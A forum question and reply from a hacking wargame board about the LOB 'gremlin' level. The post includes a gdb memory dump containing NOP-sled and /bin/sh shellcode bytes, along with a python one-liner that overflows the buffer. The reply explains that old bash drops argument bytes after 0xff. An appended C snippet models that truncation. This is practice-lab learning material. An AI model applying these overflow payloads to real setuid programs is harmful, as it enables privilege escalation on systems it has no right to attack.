Level Hacking

incaro
LOB question. (BASH2)

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_level&no=3211


_____[gdb stack]_____________________________________________________________________
....
0xbffffa08:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffa18:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffa28:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffa38:     0x90909090      0x90909090      0xcd58316a      0x89c38980
(gdb)
0xbffffa48:     0x58466ac1      0x685080cd      0x68732f2f      0x69622f68
0xbffffa58:     0x50e3896e      0x99e18953      0x80cd0bb0      0x90909090
0xbffffa68:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffa78:     0x90909090      0x4000f9a8      0x00000002      0xbffffac4
...
(gdb) i reg ebp
ebp            0xbffffa78       -1073743240
_______________________________________________________________________________________
Question 1) ./gremlin $(python -c 'print "[NOP]"*200 + "[SHELLCODE]" + "[NOP]"*24 + "[RET]"')
As shown above, I definitely overwrote it with 260 + the [RET] address.
The RET address was overwritten fine on F.T.Z, so I don't understand why on LOB it shows 0X4000F9A8, with the leading bits not overwritten.
- I searched the posts and also tried "export LANG=C", but it made no difference.

Question 2) I kept getting a Segmentation fault, so I looked it up and was told to use "bash2".
It definitely works when I use bash2. But I don't know the reason why.
Just as above, the ret address still looks not overwritten in gdb.... I can't tell what is different... I would like to know why something that worked fine on F.T.Z without bash2.... only gets cleared when I use "bash2".


  Hit : 3624     Date : 2011/05/23 04:43



    
W.H. If you use bash2 and try the attack you will see it for yourself: all the values after 0xff go in properly.

In bash, on the other hand, every value after 0xff is completely ignored.

Judging from this, bash seems to treat 0xff as the value 0x00 (NULL), but I'm not sure whether that is accurate.

In any case, bash2 is used because it recognizes the 0xff value properly and passes the values after it through correctly instead of ignoring them.

If you want to see the difference for yourself, try using dumpcode.
2011/05/23  
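
Added example, not part of the original thread or of the challenge's code: a small C model of how an argument that ends at its first 0xff byte, as the reply describes, would leave a word like the 0x4000f9a8 seen in the gdb dump. Assumptions: the program copies the argument with a NUL-terminated string copy; the four sample bytes and the previous slot value are constructed; len_after_ff_cut and slot_after_copy are hypothetical helper names, and the cut models the reply's description, not bash's actual code.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Model of the behaviour the reply describes for the old bash: the argument
 * ends at its first 0xff byte. Returns how many bytes of arg survive. */
size_t len_after_ff_cut(const unsigned char *arg, size_t len)
{
    const unsigned char *ff = memchr(arg, 0xff, len);
    return ff ? (size_t)(ff - arg) : len;
}

/* Model of a NUL-terminated string copy ending on a 4-byte little-endian
 * slot: n bytes of tail are written, then one 0x00 terminator if it still
 * falls inside the slot. Bytes beyond that keep their previous value. */
uint32_t slot_after_copy(uint32_t original, const unsigned char *tail, size_t n)
{
    unsigned char slot[4];
    size_t i;

    for (i = 0; i < 4; i++)               /* little-endian layout in memory */
        slot[i] = (unsigned char)(original >> (8 * i));
    for (i = 0; i < n && i < 4; i++)
        slot[i] = tail[i];
    if (n < 4)
        slot[n] = 0x00;                   /* the string terminator */
    return (uint32_t)slot[0] | ((uint32_t)slot[1] << 8) |
           ((uint32_t)slot[2] << 16) | ((uint32_t)slot[3] << 24);
}

int main(void)
{
    /* Constructed sample: four bytes whose third is 0xff, and a constructed
     * previous slot value whose top byte is 0x40. */
    const unsigned char want[4] = { 0xa8, 0xf9, 0xff, 0xbf };
    const uint32_t previous = 0x400309cbu;

    size_t cut = len_after_ff_cut(want, sizeof want);
    printf("bytes delivered when cut at 0xff: %zu of %zu\n", cut, sizeof want);
    printf("slot, argument cut at 0xff: 0x%08x\n",
           (unsigned)slot_after_copy(previous, want, cut));
    printf("slot, argument intact:      0x%08x\n",
           (unsigned)slot_after_copy(previous, want, sizeof want));
    return 0;
}
```

With the cut, only two bytes and the terminator reach the slot, so its top byte keeps the previous value.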